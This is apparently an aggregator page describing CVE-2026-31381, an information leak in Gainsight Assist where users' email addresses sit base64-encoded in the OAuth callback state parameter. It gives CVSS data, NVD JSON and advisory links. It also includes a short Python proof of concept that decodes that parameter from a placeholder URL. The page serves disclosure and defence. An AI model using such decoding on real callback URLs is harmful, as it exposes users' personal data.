Security Vulnerability Report
中文
CVE-2026-31381 CVSS 5.3 MEDIUM

CVE-2026-31381

Published: 2026-03-20 14:16:15
Last Modified: 2026-04-16 15:16:54
Source: [email protected]

Description

An attacker can extract user email addresses (PII) exposed in base64 encoding via the state parameter in the OAuth callback URL.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gainsight:assist:-:*:*:*:*:*:*:* - VULNERABLE
Gainsight Assist (修复前特定版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64 import urllib.parse # Simulated vulnerable OAuth callback URL # The 'state' parameter contains the base64 encoded email (PII) target_url = "https://example.com/oauth/callback?state=eyJlbWFpbCI6InVzZXJAZXhhbXBsZS5jb20ifQ%3D%3D" # Parse the URL to extract the state parameter parsed_url = urllib.parse.urlparse(target_url) params = urllib.parse.parse_qs(parsed_url.query) encoded_state = params.get('state', [None])[0] if encoded_state: try: # Decode URL encoding (e.g., %3D -> =) url_decoded_state = urllib.parse.unquote(encoded_state) # Decode Base64 to extract the PII decoded_bytes = base64.b64decode(url_decoded_state) decoded_string = decoded_bytes.decode('utf-8') print(f"[+] Leaked PII found: {decoded_string}") except Exception as e: print(f"[-] Error decoding state: {e}") else: print("[-] No state parameter found in URL.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31381", "sourceIdentifier": "[email protected]", "published": "2026-03-20T14:16:14.567", "lastModified": "2026-04-16T15:16:53.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker can extract user email addresses (PII) exposed in base64 encoding via the state parameter in the OAuth callback URL."}, {"lang": "es", "value": "Un atacante puede extraer direcciones de correo electrónico de usuario (IIP) expuestas en codificación base64 a través del parámetro state en la URL de devolución de llamada de OAuth."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-598"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gainsight:assist:-:*:*:*:*:*:*:*", "matchCriteriaId": "CEF026DD-1AD7-44D0-8960-A5DDAE4F1BDE"}]}]}], "references": [{"url": "http://www.rapid7.com/blog/post/ve-cve-2026-31381-cve-2026-31382-gainsight-assist-information-disclosure-xss-fixed", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://communities.gainsight.com/community-news-2/recent-gainsight-assist-plugin-remediations-cve-2026-31381-and-cve-2026-31382-30587", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.